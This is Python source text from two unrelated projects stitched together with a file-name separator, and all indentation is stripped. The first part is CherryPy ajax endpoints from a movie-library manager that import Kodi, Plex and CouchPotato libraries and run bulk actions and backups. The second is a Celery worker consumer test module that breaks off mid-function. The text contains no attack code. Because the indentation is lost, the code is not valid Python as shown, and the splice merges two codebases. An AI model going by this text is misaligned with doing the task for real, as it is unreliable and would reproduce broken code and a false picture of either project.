Returns dict ajax-style response
'''
r = Metadata.update(imdbid, tmdbid)
if r['response'] is True:
return {'response': True, 'message': _('Metadata updated.')}
else:
return r
@cherrypy.expose
@cherrypy.tools.json_out()
def single_movie_details(self, key, value):
''' Gets single movie's details from database
key (str): key for sql.get_movie_details
value (str): value for sql.get_movie_details
Returns dict
'''
return core.sql.get_movie_details(key, value)
@cherrypy.expose
@cherrypy.tools.json_out()
def set_movie_details(self, data):
''' Updates movie in database
data (dict): movie fields and values to update
data *must* include valid tmdbid
Returns dict
'''
data = json.loads(data)
tmdbid = data.pop('tmdbid')
if not core.sql.update_multiple_values('MOVIES', data, 'tmdbid', tmdbid):
return {'response': False, 'error': Errors.database_write}
else:
return {'response': True, 'message': 'Database Updated'}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url (str): url of kodi server
Calls Kodi import method to gather list.
Returns dict ajax-style response
'''
return library.ImportKodiLibrary.get_movies(url)
@cherrypy.expose
def import_kodi_movies(self, movies):
''' Imports list of movies in movies from Kodi library
movie_data (str): json-formatted list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
logging.info('Adding {} Kodi movies to library.'.format(length))
for movie in movies:
if not movie['imdbid']:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format("NONE")})
progress += 1
continue
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if not tmdb_data or not tmdb_data[0].get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
tmdb_data = tmdb_data[0]
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['finished_file'] = (movie.get('finished_file') or '').strip()
movie['origin'] = 'Kodi Import'
response = Manage.add_movie(movie)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'title': movie['title'], 'imdbid': movie['imdbid'], 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_kodi_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def upload_plex_csv(self, file_input):
''' Recieves upload of csv from browser
file_input (b'str): csv file fo read
Reads/parses csv file into a usable dict
Returns dict ajax-style response
'''
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e:
logging.error('Unable to parse Plex CSV', exc_info=True)
return {'response': False, 'error': str(e)}
if csv_text:
return library.ImportPlexLibrary.read_csv(csv_text)
else:
return {'response': True, 'complete': [], 'incomplete': []}
@cherrypy.expose
def import_plex_csv(self, movies, corrected_movies):
''' Imports list of movies genrated by csv import
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('Adding {} Plex movies to library.'.format(len(corrected_movies)))
for movie in corrected_movies:
tmdbdata = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
movie['year'] = tmdbdata['release_date'][:4]
movie.update(tmdbdata)
movie_data.append(movie)
else:
logging.error(Errors.tmdb_not_found.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
logging.info('Adding {} Plex movies to library.'.format(length))
for movie in movie_data:
logging.info('Importing Plex movie {} {}'.format(movie.get('title', ''), movie.get('year', '')))
fm = False
if not movie.get('imdbid') and movie.get('tmdbid'):
tmdb_data = TheMovieDatabase._search_tmdbid(movie['tmdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
fm = True
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['tmdbid'])})
progress += 1
continue
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Plex Import'
if not movie.get('id'):
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
response = Manage.add_movie(movie, full_metadata=fm)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'error': response['error'], 'title': movie['title']})
progress += 1
continue
else:
logging.error(Errors.tmdb_not_found.format(movie['title']))
yield json.dumps({'response': False, 'progress': [progress, length], 'error': _('Unable to find IMDB ID for {} on TheMovieDB.').format(movie['title']), 'title': movie['title']})
progress += 1
continue
if fake_results:
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
if fake_results:
core.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_cp_movies(self, url, apikey):
''' Gets movies from CP server
url (str): url to cp server
apikey (str): cp api key
Reads/parses cp api response
Returns dict ajax-style response
'''
url = '{}/api/{}/movie.list/'.format(url, apikey)
if not url.startswith('http'):
url = 'http://{}'.format(url)
return library.ImportCPLibrary.get_movies(url)
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
''' Imports movies from CP list to library
wanted (list): dicts of wanted movies
finished (list): dicts of finished movies
Yields dict ajax-style response
'''
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(wanted)))
for movie in wanted:
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(finished)))
for movie in finished:
movie['predb'] = 'found'
movie['status'] = 'Disabled'
movie['origin'] = 'CouchPotato Import'
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_backlog_search(self, movies):
''' Bulk manager action for backlog search
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk backlog search for {} movies.'.format(len(movies)))
ids = [i['imdbid'] for i in movies]
movies = [i for i in core.sql.get_user_movies() if i['imdbid'] in ids]
for i, movie in enumerate(movies):
title = movie['title']
year = movie['year']
imdbid = movie['imdbid']
year = movie['year']
quality = movie['quality']
logging.info('Performing backlog search for {} {}.'.format(title, year))
if not searcher.search(imdbid, title, year, quality):
response = {'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_backlog_search._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_update_metadata(self, movies):
''' Bulk manager action for metadata update
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk metadata update for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
r = Metadata.update(movie.get('imdbid'), movie.get('tmdbid'))
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_update_metadata._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_quality(self, movies, quality):
''' Bulk manager action to change movie quality profile
movies (list): dicts of movies, must contain keys imdbid
quality (str): quality to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting quality to {} for: {}'.format(quality, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_change_quality._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_category(self, movies, category):
''' Bulk manager action to change movie category
movies (list): dicts of movies, must contain keys imdbid
category (str): category to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting category to {} for: {}'.format(category, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'category', category, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_change_category._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_reset_movies(self, movies):
''' Bulk manager action to reset movies
movies (list): dicts of movies, must contain key imdbid
Removes all search results
Updates database row with db_reset dict
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Resetting status for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
logging.debug('Resetting {}'.format(movie['imdbid']))
imdbid = movie['imdbid']
if not core.sql.purge_search_results(imdbid):
yield json.dumps({'response': False, 'error': _('Unable to purge search results.'), 'imdbid': imdbid, 'index': i + 1})
continue
db_reset = {'quality': config.default_profile(),
'status': 'Waiting',
'finished_date': None,
'finished_score': None,
'backlog': 0,
'finished_file': None,
'predb': None,
'predb_backlog': None
}
if not core.sql.update_multiple_values('MOVIES', db_reset, 'imdbid', imdbid):
yield json.dumps({'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1})
continue
yield json.dumps({'response': True, 'index': i + 1})
manager_reset_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_remove_movies(self, movies):
''' Bulk action to remove movies
movies (list): dicts of movies, must contain key imdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Removing {} movies from library.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.remove_movie(movie['imdbid'])
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield(json.dumps(response))
manager_remove_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def generate_stats(self, category=None):
''' Gets library stats for graphing page
Returns dict of library stats
'''
return Manage.get_stats(category)
@cherrypy.expose
@cherrypy.tools.json_out()
def create_backup(self):
''' Creates backup zip file ./watcher.zip
Returns dict ajax-style response
'''
logging.info('Creating backup of Watcher as {}'.format(os.path.join(core.PROG_PATH, 'watcher.zip')))
try:
backup.backup(require_confirm=False)
except Exception as e:
logging.error('Unable to create backup.', exc_info=True)
return {'response': False, 'error': str(e)}
return {'response': True, 'message': _('Backup created as {}').format(os.path.join(core.PROG_PATH, 'watcher.zip'))}
@cherrypy.expose
@cherrypy.tools.json_out()
def restore_backup(self, fileUpload):
logging.info('Restoring backup from uploaded zip.')
n = datetime.datetime.today().microsecond
tmp_zip = os.path.join(core.PROG_PATH, 'restore_{}.zip'.format(n))
try:
with open(tmp_zip, 'wb') as f:
f.seek(0)
f.write(fileUpload.file.read())
logging.info('Restore zip temporarily stored as {}.'.format(tmp_zip))
backup.restore(require_confirm=False, file=tmp_zip)
logging.info('Removing temporary zip {}'.format(tmp_zip))
os.unlink(tmp_zip)
except Exception as e:
logging.error('Unable to restore backup.', exc_info=True)
return {'response': False}
threading.Timer(3, core.restart).start()
return {'response': True}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_task_execute(self, name):
''' Calls task's now() function to execute task now
name (str): name of scheduled task to run
Response includes core.NOTIFICATIONS so the browser can display any
notifications generated during the task.
Returns dict ajax-style response
'''
try:
logging.info('Manually executing task {}.'.format(name))
task = core.scheduler_plugin.task_list[name]
task.now()
le = task.last_execution
return {'response': True, 'message': _('Finished task {}.').format(name), 'last_execution': le, 'notifications': core.NOTIFICATIONS}
except Exception as e:
return {'response': False, 'error': str(e)}
|
__init__.py
|
from __future__ import absolute_import
from __future__ import with_statement
import socket
import sys
from collections import deque
from datetime import datetime, timedelta
from Queue import Empty
from kombu.transport.base import Message
from kombu.connection import BrokerConnection
from mock import Mock, patch
from nose import SkipTest
from celery import current_app
from celery.app.defaults import DEFAULTS
from celery.concurrency.base import BasePool
from celery.datastructures import AttributeDict
from celery.exceptions import SystemTerminate
from celery.task import task as task_dec
from celery.task import periodic_task as periodic_task_dec
from celery.utils import uuid
from celery.worker import WorkController
from celery.worker.buckets import FastQueue
from celery.worker.job import Request
from celery.worker.consumer import Consumer as MainConsumer
from celery.worker.consumer import QoS, RUN, PREFETCH_COUNT_MAX, CLOSE
from celery.utils.serialization import pickle
from celery.utils.timer2 import Timer
from celery.tests.utils import AppCase, Case
class PlaceHolder(object):
pass
class MyKombuConsumer(MainConsumer):
broadcast_consumer = Mock()
task_consumer = Mock()
def __init__(self, *args, **kwargs):
kwargs.setdefault("pool", BasePool(2))
super(MyKombuConsumer, self).__init__(*args, **kwargs)
def restart_heartbeat(self):
self.heart = None
class MockNode(object):
commands = []
def handle_message(self, body, message):
self.commands.append(body.pop("command", None))
class MockEventDispatcher(object):
sent = []
closed = False
flushed = False
_outbound_buffer = []
def send(self, event, *args, **kwargs):
self.sent.append(event)
def close(self):
self.closed = True
def flush(self):
self.flushed = True
class MockHeart(object):
closed = False
def stop(self):
self.closed = True
@task_dec()
def foo_task(x, y, z, **kwargs):
return x * y * z
@periodic_task_dec(run_every=60)
def foo_periodic_task():
return "foo"
def create_message(channel, **data):
data.setdefault("id", uuid())
channel.no_ack_consumers = set()
return Message(channel, body=pickle.dumps(dict(**data)),
content_type="application/x-python-serialize",
content_encoding="binary",
delivery_info={"consumer_tag": "mock"})
class test_QoS(Case):
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value, None)
def set(self, value):
return value
def test_qos_increment_decrement(self):
qos = self._QoS(10)
self.assertEqual(qos.increment(), 11)
self.assertEqual(qos.increment(3), 14)
self.assertEqual(qos.increment(-30), 14)
self.assertEqual(qos.decrement(7), 7)
self.assertEqual(qos.decrement(), 6)
with self.assertRaises(AssertionError):
qos.decrement(10)
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
self.assertEqual(qos.increment(), 0)
self.assertEqual(qos.increment(3), 0)
self.assertEqual(qos.increment(-30), 0)
self.assertEqual(qos.decrement(7), 0)
self.assertEqual(qos.decrement(), 0)
self.assertEqual(qos.decrement(10), 0)
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in xrange(1000):
qos.increment()
def sub():
for i in xrange(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
self.assertEqual(qos.value, 2010)
qos.value = 1000
threaded([add, sub]) # n = 2
self.assertEqual(qos.value, 1000)
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1,
current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX + 1)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
def test_consumer_increment_decrement(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, 10)
self.assertIn({"prefetch_count": 10}, consumer.qos.call_args)
qos.decrement()
self.assertEqual(qos.value, 9)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
qos.decrement_eventually()
self.assertEqual(qos.value, 8)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
# Does not decrement 0 value
qos.value = 0
qos.decrement()
self.assertEqual(qos.value, 0)
qos.increment()
self.assertEqual(qos.value, 0)
def test_consumer_decrement_eventually(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.decrement_eventually()
self.assertEqual(qos.value, 9)
qos.value = 0
qos.decrement_eventually()
self.assertEqual(qos.value, 0)
def test_set(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.set(12)
self.assertEqual(qos.prev, 12)
qos.set(qos.prev)
class test_Consumer(Case):
def setUp(self):
self.ready_queue = FastQueue()
self.eta_schedule = Timer()
self.logger = current_app.log.get_default_logger()
self.logger.setLevel(0)
def tearDown(self):
self.eta_schedule.stop()
def test_info(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(l.task_consumer, 10, l.logger)
info = l.info
self.assertEqual(info["prefetch_count"], 10)
self.assertFalse(info["broker"])
l.connection = current_app.broker_connection()
info = l.info
self.assertTrue(info["broker"])
def test_start_when_closed(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = CLOSE
l.start()
def test_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l._state = RUN
l.event_dispatcher = None
l.stop_consumers(close_connection=False)
self.assertTrue(l.connection)
l._state = RUN
l.stop_consumers()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l.stop_consumers()
l.stop()
l.close_connection()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
def test_close_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
l.close_connection()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
eventer = l.event_dispatcher = Mock()
eventer.enabled = True
heart = l.heart = MockHeart()
l._state = RUN
l.stop_consumers()
self.assertTrue(eventer.close.call_count)
self.assertTrue(heart.closed)
def test_receive_message_unknown(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, unknown={"baz": "!!!"})
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
l.receive_message(m.decode(), m)
@patch("celery.utils.timer2.to_timestamp")
def test_receive_message_eta_OverflowError(self, to_timestamp):
to_timestamp.side_effect = OverflowError()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=("2, 2"),
kwargs={},
eta=datetime.now().isoformat())
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.update_strategies()
l.receive_message(m.decode(), m)
self.assertTrue(m.acknowledged)
self.assertTrue(to_timestamp.call_count)
def test_receive_message_InvalidTaskError(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=(1, 2), kwargs="foobarbaz", id=1)
l.update_strategies()
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.receive_message(m.decode(), m)
self.assertIn("Received invalid task message",
logger.error.call_args[0][0])
def test_on_decode_error(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
class MockMessage(Mock):
content_type = "application/x-msgpack"
content_encoding = "binary"
body = "foobarbaz"
message = MockMessage()
l.on_decode_error(message, KeyError("foo"))
self.assertTrue(message.ack.call_count)
self.assertIn("Can't decode message body",
logger.critical.call_args[0][0])
def test_receieve_message(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=[2, 4, 8], kwargs={})
l.update_strategies()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
in_bucket = self.ready_queue.get_nowait()
self.assertIsInstance(in_bucket, Request)
self.assertEqual(in_bucket.task_name, foo_task.name)
self.assertEqual(in_bucket.execute(), 2 * 4 * 8)
self.assertTrue(self.eta_schedule.empty())
def test_start_connection_error(self):
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.connection_errors = (KeyError, )
with self.assertRaises(SyntaxError):
l.start()
l.heart.stop()
l.priority_timer.stop()
def test_start_channel_error(self):
# Regression test for AMQPChannelExceptions that can occur within the
# consumer. (i.e. 404 errors)
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.channel_errors = (KeyError, )
self.assertRaises(SyntaxError, l.start)
l.heart.stop()
l.priority_timer.stop()
def test_consume_messages_ignores_socket_timeout(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.timeout(10)
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.task_consumer = Mock()
l.connection.obj = l
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
def test_consume_messages_when_socket_error(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.error("foo")
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
c = l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
with self.assertRaises(socket.error):
l.consume_messages()
l._state = CLOSE
l.connection = c
l.consume_messages()
def test_consume_messages(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
l.consume_messages()
self.assertTrue(l.task_consumer.consume.call_count)
l.task_consumer.qos.assert_called_with(prefetch_count=10)
l.qos.decrement()
l.consume_messages()
l.task_consumer.qos.assert_called_with(prefetch_count=9)
def test_maybe_conn_error(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection_errors = (KeyError, )
l.channel_errors = (SyntaxError, )
l.maybe_conn_error(Mock(side_effect=AttributeError("foo")))
l.maybe_conn_error(Mock(side_effect=KeyError("foo")))
l.maybe_conn_error(Mock(side_effect=SyntaxError("foo")))
with self.assertRaises(IndexError):
l.maybe_conn_error(Mock(side_effect=IndexError("foo")))
def test_apply_eta_task(self):
from celery.worker import state
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(None, 10, l.logger)
task = object()
qos = l.qos.value
l.apply_eta_task(task)
self.assertIn(task, state.reserved_requests)
self.assertEqual(l.qos.value, qos - 1)
self.assertIs(self.ready_queue.get_nowait(), task)
def test_receieve_message_eta_isoformat(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
eta=datetime.now().isoformat(),
args=[2, 4, 8], kwargs={})
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, l.initial_prefetch_count, l.logger)
l.event_dispatcher = Mock()
l.enabled = False
l.update_strategies()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
items = [entry[2] for entry in self.eta_schedule.queue]
found = 0
for item in items:
if item.args[0].name == foo_task.name:
found = True
self.assertTrue(found)
self.assertTrue(l.task_consumer.qos.call_count)
l.eta_schedule.stop()
def test_on_control(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
l.reset_pidbox_node = Mock()
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = KeyError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = ValueError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.reset_pidbox_node.assert_called_with()
def test_revoke(self):
ready_queue = FastQueue()
l = MyKombuConsumer(ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
id = uuid()
t = create_message(backend, task=foo_task.name, args=[2, 4, 8],
kwargs={}, id=id)
from celery.worker.state import revoked
revoked.add(id)
l.receive_message(t.decode(), t)
self.assertTrue(ready_queue.empty())
def test_receieve_message_not_registered(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, task="x.X.31x", args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
def test_receieve_message_ack_raises(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
l.connection_errors = (socket.error, )
l.logger = Mock()
m.reject = Mock()
m.reject.side_effect = socket.error("foo")
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
m.reject.assert_called_with()
self.assertTrue(l.logger.critical.call_count)
def test_receieve_message_eta(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.event_dispatcher = Mock()
l.event_dispatcher._outbound_buffer = deque()
backend = Mock()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={},
eta=(datetime.now() +
timedelta(days=1)).isoformat())
l.reset_connection()
p = l.app.conf.BROKER_CONNECTION_RETRY
l.app.conf.BROKER_CONNECTION_RETRY = False
try:
l.reset_connection()
finally:
l.app.conf.BROKER_CONNECTION_RETRY = p
l.stop_consumers()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
in_hold = self.eta_schedule.queue[0]
self.assertEqual(len(in_hold), 3)
eta, priority, entry = in_hold
task = entry.args[0]
self.assertIsInstance(task, Request)
self.assertEqual(task.task_name, foo_task.name)
self.assertEqual(task.execute(), 2 * 4 * 8)
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
def test_reset_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
chan = l.pidbox_node.channel = Mock()
l.connection = Mock()
chan.close.side_effect = socket.error("foo")
l.connection_errors = (socket.error, )
l.reset_pidbox_node()
chan.close.assert_called_with()
def test_reset_pidbox_node_green(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pool = Mock()
l.pool.is_green = True
l.reset_pidbox_node()
l.pool.spawn_n.assert_called_with(l._green_pidbox_node)
def test__green_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
class BConsumer(Mock):
def __enter__(self):
self.consume()
return self
def __exit__(self, *exc_info):
self.cancel()
l.pidbox_node.listen = BConsumer()
connections = []
class Connection(object):
def __init__(self, obj):
connections.append(self)
self.obj = obj
self.default_channel = self.channel()
self.closed = False
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def channel(self):
return Mock()
def drain_events(self, **kwargs):
self.obj.connection = None
self.obj._pidbox_node_shutdown.set()
